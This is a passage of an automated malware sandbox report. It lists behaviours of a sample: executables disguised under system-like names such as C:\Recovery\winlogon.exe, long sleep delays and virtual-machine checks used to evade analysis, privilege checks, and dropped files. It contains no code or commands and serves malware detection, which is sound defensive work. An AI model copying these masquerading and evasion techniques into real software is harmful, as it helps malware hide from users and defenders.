                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeMemory allocated: 12C0000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeMemory allocated: 1B050000 memory reserve | memory write watchJump to behavior
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeMemory allocated: DD0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeMemory allocated: 1A960000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeMemory allocated: C80000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeMemory allocated: 1A6E0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeMemory allocated: 1070000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeMemory allocated: 1ADE0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeMemory allocated: 1190000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeMemory allocated: 1AB50000 memory reserve | memory write watch
                                Source: C:\Recovery\winlogon.exeMemory allocated: FE0000 memory reserve | memory write watch
                                Source: C:\Recovery\winlogon.exeMemory allocated: 1AFB0000 memory reserve | memory write watch
                                Source: C:\Recovery\winlogon.exeMemory allocated: E50000 memory reserve | memory write watch
                                Source: C:\Recovery\winlogon.exeMemory allocated: 1A910000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeMemory allocated: EB0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeMemory allocated: 1A8C0000 memory reserve | memory write watch
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeMemory allocated: 1480000 memory reserve | memory write watch
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeMemory allocated: 1B0E0000 memory reserve | memory write watch
                                Source: C:\Recovery\winlogon.exeMemory allocated: 21E0000 memory reserve | memory write watch
                                Source: C:\Recovery\winlogon.exeMemory allocated: 1A3C0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 600000Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 599891Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 599781Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 599671Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 599563Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 599452Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 599331Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 597297Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 597175Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 922337203685477
                                Source: C:\Recovery\winlogon.exeThread delayed: delay time: 922337203685477
                                Source: C:\Recovery\winlogon.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeThread delayed: delay time: 922337203685477
                                Source: C:\Recovery\winlogon.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWindow / User API: threadDelayed 3628Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWindow / User API: threadDelayed 2325Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeDropped PE file which has not been started: C:\Users\user\Desktop\tnEMlbYs.logJump to dropped file
                                Source: C:\Recovery\winlogon.exeDropped PE file which has not been started: C:\Users\user\Desktop\aEtIhTbg.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeDropped PE file which has not been started: C:\Users\user\Desktop\vybNluDs.logJump to dropped file
                                Source: C:\Recovery\winlogon.exeDropped PE file which has not been started: C:\Users\user\Desktop\WslZMRrk.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeDropped PE file which has not been started: C:\Users\user\Desktop\MFrsFgjH.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeDropped PE file which has not been started: C:\Users\user\Desktop\lKwWBiIK.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeDropped PE file which has not been started: C:\Users\user\Desktop\TDfrhvdw.logJump to dropped file
                                Source: C:\Recovery\winlogon.exeDropped PE file which has not been started: C:\Users\user\Desktop\LdxTVLQK.logJump to dropped file
                                Source: C:\Recovery\winlogon.exeDropped PE file which has not been started: C:\Users\user\Desktop\tRVOBpwv.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeDropped PE file which has not been started: C:\Users\user\Desktop\RAtJMMZA.logJump to dropped file
                                Source: C:\Recovery\winlogon.exeDropped PE file which has not been started: C:\Users\user\Desktop\rGzNBWQu.logJump to dropped file
                                Source: C:\Recovery\winlogon.exeDropped PE file which has not been started: C:\Users\user\Desktop\BudDliLc.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_3-24194
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_3-25436
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-25448
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308Thread sleep time: -600000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308Thread sleep time: -599891s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308Thread sleep time: -599781s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308Thread sleep time: -599671s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308Thread sleep time: -599563s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308Thread sleep time: -599452s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308Thread sleep time: -599331s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308Thread sleep time: -100000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308Thread sleep time: -99859s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308Thread sleep time: -99750s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308Thread sleep time: -99640s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308Thread sleep time: -99531s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308Thread sleep time: -99422s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308Thread sleep time: -99312s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308Thread sleep time: -99203s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308Thread sleep time: -99094s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308Thread sleep time: -98984s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308Thread sleep time: -98875s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308Thread sleep time: -98765s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308Thread sleep time: -98656s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308Thread sleep time: -98547s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308Thread sleep time: -98437s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308Thread sleep time: -98328s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308Thread sleep time: -98219s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308Thread sleep time: -98109s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308Thread sleep time: -597297s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308Thread sleep time: -597175s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7188Thread sleep time: -30000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7804Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe TID: 7976Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe TID: 8012Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7564Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 2004Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Recovery\winlogon.exe TID: 7660Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Recovery\winlogon.exe TID: 7640Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7988Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe TID: 1732Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Recovery\winlogon.exe TID: 8052Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Recovery\winlogon.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Recovery\winlogon.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Recovery\winlogon.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A2BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00A2BA94
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A3D420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00A3D420
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: 3_2_0031BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,3_2_0031BA94
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: 3_2_0032D420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,3_2_0032D420
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: 4_2_0072A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,4_2_0072A69B
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: 4_2_0073C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,4_2_0073C220
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A3F82F VirtualQuery,GetSystemInfo,0_2_00A3F82F
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 600000Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 599891Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 599781Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 599671Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 599563Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 599452Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 599331Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 100000Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 99859Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 99750Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 99640Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 99531Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 99422Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 99312Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 99203Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 99094Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 98984Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 98875Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 98765Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 98656Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 98547Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 98437Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 98328Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 98219Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 98109Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 597297Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 597175Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 922337203685477
                                Source: C:\Recovery\winlogon.exeThread delayed: delay time: 922337203685477
                                Source: C:\Recovery\winlogon.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeThread delayed: delay time: 922337203685477
                                Source: C:\Recovery\winlogon.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                Source: work.exe, 00000003.00000003.1630533570.0000000002D5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y.,
                                Source: dwartg.exe, 00000004.00000003.1628390760.0000000002E82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
                                Source: dwartg.exe, 00000004.00000003.1628390760.0000000002E82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: winlogon.exe, 0000002B.00000002.1920928319.0000000012489000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 